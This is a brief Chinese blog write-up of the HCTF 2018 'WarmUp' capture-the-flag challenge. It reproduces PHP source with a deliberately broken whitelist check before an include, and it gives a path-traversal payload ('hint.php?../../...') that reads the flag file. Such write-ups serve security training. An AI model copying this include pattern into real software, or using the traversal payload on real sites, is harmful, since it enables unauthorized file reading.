[HCTF 2018]WarmUp_BUUCTF
阿新 • • 發佈:2021-12-08
開啟網站
檢視原始碼
訪問source.php檔案,開始程式碼審計
<!--?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=-->"source.php","hint"=>"hint.php"]; if (! isset($page) || !is_string($page)) { echo "you can't see it"; return false; } if (in_array($page, $whitelist)) { return true; } $_page = mb_substr( $page, 0, mb_strpos($page . '?', '?') //擷取問號前面的子串 ); if (in_array($_page, $whitelist)) { return true; } $_page = urldecode($page); $_page = mb_substr( $_page, 0, mb_strpos($_page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } echo "you can't see it"; return false; } } if (! empty($_REQUEST['file']) //file引數值不是null、並且file引數值符合is_string()函式、並且符合emmm::checkFile() && is_string($_REQUEST['file']) && emmm::checkFile($_REQUEST['file']) ) { include $_REQUEST['file']; //最終的目標 exit; } else { echo "<br><img src="\" https:="" i.loli.net="" 2018="" 11="" 01="" 5bdb0d93dc794.jpg\""="">"; } ?>
source.php?file=hint.php
?file=hint.php?../../../../../../ffffllllaaaagggg
本文來自部落格園,作者:oldliutou,轉載請註明原文連結:https://www.cnblogs.com/oldliutou/p/15664604.html